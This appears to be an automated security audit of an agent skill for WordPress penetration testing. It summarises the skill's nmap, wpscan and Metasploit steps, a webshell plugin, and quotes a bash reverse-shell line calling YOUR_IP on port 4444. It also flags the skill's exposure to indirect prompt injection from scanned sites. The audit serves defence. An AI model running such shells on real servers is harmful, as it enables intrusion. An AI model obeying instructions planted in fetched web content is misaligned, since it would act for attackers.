WordPress Penetration Testing

Warn

Audited by Gen Agent Trust Hub on Sep 14, 2026

Risk Level: MEDIUMCOMMAND_EXECUTIONDYNAMIC_EXECUTIONINDIRECT_PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill provides detailed command sequences for running network discovery and exploitation tools, including nmap, wpscan, and the Metasploit Framework (msfconsole).
  • [COMMAND_EXECUTION]: It documents specific exploitation modules, such as wp_admin_shell_upload, which are used to gain unauthorized system access through administrative credentials.
  • [DYNAMIC_EXECUTION]: The skill contains templates for generating a PHP reverse shell (/bin/bash -i >& /dev/tcp/YOUR_IP/4444 0>&1) designed to provide persistent remote access to a target server.
  • [DYNAMIC_EXECUTION]: It provides instructions for creating and deploying a malicious WordPress plugin that functions as a webshell by utilizing the system() function to execute arbitrary shell commands.
  • [INDIRECT_PROMPT_INJECTION]: The skill presents an attack surface for indirect prompt injection as it is designed to ingest and process data from external, untrusted web targets.
  • Ingestion points: Data enters the agent context through the outputs of curl and wpscan commands targeting external websites (SKILL.md).
  • Boundary markers: There are no explicit delimiters or instructions provided to the agent to disregard malicious instructions embedded in the target website's content or metadata.
  • Capability inventory: The skill uses significant system capabilities including subprocess calls (nmap, wpscan, msfconsole), file system writes (cat > malicious.php), and network operations (curl).
  • Sanitization: The skill does not implement validation or escaping for the data fetched from remote targets before it is processed by the agent.
Audit Metadata
Risk Level
MEDIUM
Analyzed
Sep 14, 2026, 07:19 AM
Security Audit — agent-trust-hub — WordPress Penetration Testing